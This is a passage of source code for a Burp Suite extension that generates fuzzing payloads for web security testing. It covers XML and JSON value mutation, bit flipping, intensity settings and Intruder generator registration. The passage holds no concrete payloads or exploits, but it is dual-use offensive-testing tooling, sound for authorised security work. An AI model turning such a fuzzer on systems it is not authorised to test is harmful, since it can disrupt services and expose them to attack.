        elementsInXml = list(XMLTypeFuzzer.etree_iter_path(root))
        fuzzEveryN = PayloadGenerationIntensity.fuzzEveryN(self.intensity, len(elementsInXml))
        num = 0

        for (elem, path) in elementsInXml:
            elemText = elem.text
            path = path.replace('./', './/')

            if not elemText or not elemText.strip(): continue
            num += 1
            if num % fuzzEveryN != 0: continue

            for attrName, attrValue in elem.attrib.items():
                num += 1
                if num % fuzzEveryN != 0: continue

                attribMutations = fuzzer.getMutations(attrValue) 
                for mut in attribMutations:
                    if data.count(attrValue) == 1:
                        dataMutated = data.replace(attrValue, mut)
                        mutations.append(dataMutated)

                    elif data.count('"' + attrValue + '"') == 1:
                        dataMutated = data.replace('"' + attrValue + '"', '"' + mut + '"')
                        mutations.append(dataMutated)

            elemTextMutations = fuzzer.getMutations(elemText)
            for mut in elemTextMutations:
                if data.count(elemText) == 1:
                    dataMutated = data.replace(elemText, mut)
                    mutations.append(dataMutated)

                elif data.count('"' + elemText + '"') == 1:
                    dataMutated = data.replace('"' + elemText + '"', '"' + mut + '"')
                    mutations.append(dataMutated)

                elif data.count('>' + elemText + '<') == 1:
                    dataMutated = data.replace('>' + elemText + '<', '>' + mut + '<')
                    mutations.append(dataMutated)

                else:
                    elem.text = mut
                    mutations.append(XMLTypeFuzzer.encode(root))
                    elem.text = elemText

        return mutations


class PayloadGenerationIntensity:
    MINIMAL = 1
    LOW = 2
    MEDIUM = 5
    HIGH = 8
    EXTREME = 10

    @staticmethod
    def fuzzEveryN(intensity, fuzzablesNumber):
        fuzzEvery = 0
        if intensity == PayloadGenerationIntensity.EXTREME: fuzzEvery = 1
        elif intensity == PayloadGenerationIntensity.HIGH: fuzzEvery = 1
        elif intensity == PayloadGenerationIntensity.MEDIUM: fuzzEvery = 2
        elif intensity == PayloadGenerationIntensity.LOW: fuzzEvery = 2
        elif intensity == PayloadGenerationIntensity.MINIMAL: fuzzEvery = 3

        if fuzzablesNumber < 10:
            fuzzEvery = 1

        return fuzzEvery


# =============================================
# BURP EXTENDER INTERFACE IMPLEMENTATION
#

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

        print('''
    Context-Aware Payload Fuzzer
    Mariusz B. / mgeeky, v{}.

[+] For more informations about this extension - please visit:
    https://github.com/mgeeky/burpContextAwareFuzzer

[+] Unique pattern applied to input-values, to look for in responses:
    "{}"
'''.format(
            VERSION, UNIQUE_PATTERN_TO_SEARCH_FOR
        ))

        generators = (
            BitFlipperPayloadGenerator(),
            MinimalIntensityPayloadGenerator(),
            LowIntensityPayloadGenerator(),
            MediumIntensityPayloadGenerator(),
            HighIntensityPayloadGenerator(),
            ExtremeIntensityPayloadGenerator()
        )

        for gen in generators:
            gen._callbacks = callbacks
            gen._helpers = self._helpers
            callbacks.registerIntruderPayloadGeneratorFactory(gen)

class BitFlipperPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Bit Flipper'

    def createNewInstance(self, attack):
        return ContextAwareBitFlipper(self, attack)

class MinimalIntensityPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Payload Fuzzer: Minimal intensity'

    def createNewInstance(self, attack):
        return ContextAwareFuzzer(self, attack, PayloadGenerationIntensity.MINIMAL)

class LowIntensityPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Payload Fuzzer: Low intensity'

    def createNewInstance(self, attack):
        return ContextAwareFuzzer(self, attack, PayloadGenerationIntensity.LOW)

class MediumIntensityPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Payload Fuzzer: Medium intensity'

    def createNewInstance(self, attack):
        return ContextAwareFuzzer(self, attack, PayloadGenerationIntensity.MEDIUM)

class HighIntensityPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Payload Fuzzer: High intensity'

    def createNewInstance(self, attack):
        return ContextAwareFuzzer(self, attack, PayloadGenerationIntensity.HIGH)

class ExtremeIntensityPayloadGenerator(IIntruderPayloadGeneratorFactory):
    def getGeneratorName(self):
        return 'Context-Aware Payload Fuzzer: Extreme intensity'

    def createNewInstance(self, attack):
        return ContextAwareFuzzer(self, attack, PayloadGenerationIntensity.EXTREME)


# =============================================
# MAIN EXTENSION INTERFACE IMPLEMENTATION
#

class ContextAwareBitFlipper(IIntruderPayloadGenerator):
    def __init__(self, extender, attack):
        self._extender = extender
        self._attack = attack
        self._helpers = extender._helpers

        self.mutations = []
        self.payloadsToGenerate = 10
        self.payloadsGenerated = 0

    def hasMorePayloads(self):
        return (self.payloadsGenerated < self.payloadsToGenerate)

    def getNextPayload(self, currentPayload):
        payload = self._helpers.bytesToString(currentPayload)

        reencode = ReEncoder()
        origPayload = payload
        payload = reencode.decode(payload, ReEncoder.PREFER_BINARY)

        if self.payloadsGenerated == 0:
            print('[.] ReEncoder decoded value: "{}" into "{}" using chain: ({})'.format(
                origPayload[:64], payload[:64], '->'.join(reencode.encodings)
            ))

        payload = self.mutatePayload(payload)
        self.payloadsGenerated += 1

        return reencode.encode(payload)

    def reset(self):
        self.payloadsGenerated = 0
        self.mutations = []

        print('[.] Reset.')

    def prepareMutations(self, payload):
        # Bit-flipping algorithm
        flips = []

        for idx in range(len(payload)):
            c = payload[idx]
            code = ord(c)
            for i in range(8):
                code = code ^ (1 << i)
                tmp = payload[:idx] + chr(code) + payload[idx+1:]
                flips.append(tmp)

        return flips

    def mutatePayload(self, payload):
        if len(self.mutations) == 0:
            #print('\n[.] Generating mutations for: "{}"'.format(payload[:100]))
            
            self.mutations = self.prepareMutations(payload)
            self.payloadsToGenerate = len(self.mutations)
            
            print('[.] Generated {} mutations'.format(len(self.mutations)))

        #print('[>] Returning mutation {}: "{}"'.format(
        #   self.payloadsGenerated, self.mutations[self.payloadsGenerated]
        #))

        return self.mutations[self.payloadsGenerated]

class ContextAwareFuzzer(IIntruderPayloadGenerator):
    def __init__(self, extender, attack, intensity):
        self._extender = extender
        self._attack = attack
        self._helpers = extender._helpers

        self.intensity = intensity

        self.mutations = []
        self.payloadsToGenerate = 10
        self.payloadsGenerated = 0

        # BUG: TODO:
        print('[!] XMLTypeFuzzer not available due to Jython\'s problems with SAXParser:')
        print('\t"Caused by: java.lang.ClassNotFoundException: org.apache.xerces.parsers.SAXParser"')
        print("[!] If you think problem is solved, refer to 'ContextAwareFuzzer.__init__()' and uncomment 'XMLTypeFuzzer' in 'self.typeHandlers'.")
        print('')

        self.typeHandlers = (
            JSONTypeFuzzer(self.intensity),            
            #XMLTypeFuzzer(self.intensity),

            # The most generic type fuzzer must be the last one
            BasicTypeFuzzer(self.intensity),
        )

    def hasMorePayloads(self):
        return (self.payloadsGenerated < self.payloadsToGenerate)

    def getNextPayload(self, currentPayload):
        payload = self._helpers.bytesToString(currentPayload)

        reencode = ReEncoder()
        origPayload = payload
        payload = reencode.decode(payload)

        if self.payloadsGenerated == 0:
            print('[.] ReEncoder decoded value: "{}" into "{}" using chain: ({})'.format(
                origPayload[:64], payload[:64], '->'.join(reencode.encodings)
            ))

        payload = self.mutatePayload(payload)
        self.payloadsGenerated += 1

        return reencode.encode(payload)

    def reset(self):
        self.payloadsGenerated = 0
        self.mutations = []

        for typeHandler in self.typeHandlers:
            typeHandler.reset()

        print('[.] Reset.')

    def prepareMutations(self, payload):
        for typeHandler in self.typeHandlers:
            if typeHandler.check(payload):
                print('\n[.] Payload "{}" will be handled by: {}'.format(
                    payload[:100], typeHandler.name()
                ))
                return typeHandler.getMutations(payload)

        return []

    def mutatePayload(self, payload):
        if len(self.mutations) == 0:
            #print('\n[.] Generating mutations for: "{}"'.format(payload[:100]))
            
            self.mutations = self.prepareMutations(payload)
            self.payloadsToGenerate = len(self.mutations)
            
            print('[.] Generated {} mutations'.format(len(self.mutations)))

        #print('[>] Returning mutation {}: "{}"'.format(
        #   self.payloadsGenerated, self.mutations[self.payloadsGenerated]
        #))

        return self.mutations[self.payloadsGenerated]